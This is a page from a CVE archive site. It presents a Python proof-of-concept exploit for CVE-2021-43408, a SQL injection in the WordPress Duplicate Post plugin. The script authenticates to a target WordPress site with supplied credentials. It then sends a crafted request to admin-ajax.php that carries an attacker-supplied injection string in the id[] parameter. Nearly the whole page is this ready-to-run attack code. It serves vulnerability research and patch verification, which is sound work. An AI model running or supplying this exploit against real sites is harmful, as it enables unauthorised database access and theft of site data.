4837 Total CVEs
26 Years
GitHub
Home / 2021 / CVE-2021-43408
README.md
README.md not found for CVE-2021-43408. The file may not exist in the repository.
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
# Banner:
banner =  """
                                                            
 ### #   # ####      ###  ##  ### ###          #  ###   #   ##   ### 
##   #   # #           # #  #   #   #         ##    #  ##  #  # #  # 
#     # #  ###         # #  #   #   #         ##  ##   ##  #  #  ##  
#     # #  #    ####  #  #  #  #    #   #### # #    # # #  #  # #### 
##    # #  #         #   #  # #     #        ####   # #### #  # #  # 
 ###   #   ####      ###  ##  ### #####        #  ##    #   ##   ##  
                            
                            [+] Duplicate Post SQL Injection                                                      
"""

print(banner)

import argparse
import requests
from datetime import datetime

# User-Input:
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Duplicate Post - SQL Injection')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
my_parser.add_argument('-C', '--COMMAND', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
command = args.COMMAND

print('')
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))
print('')

# Authentication:
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'
check = session.get(auth_url)
# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}
auth = session.post(auth_url, headers=header, data=body)
#print(auth.text)
check = session.get('http://' + target_ip + ':' + target_port + wp_path+ 'wp-admin/edit.php')
# Exploit:
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'

# Header (Exploit):
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0',
    'Accept': '*/*',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Referer': 'http://' + target_ip + '/wordpress/wp-admin/edit.php',
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'X-Requested-With': 'XMLHttpRequest',
    'Origin': 'http://' + target_ip,
    'Connection': 'close'
}

# Body (Exploit):
body = {
    "action": "cdp_action_handling",
    "token": "cdp",
    "f": "copy_post",
    "origin": "tooltip",
    "id[]": command,
    "data[type]": "copy-quick",
    "data[times]": "1",
    "data[site]": "-1",
    "data[profile]": "default",
    "data[swap]": "fals"
}
a = session.post(exploit_url, headers=header, data=body)
print(a.text)
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))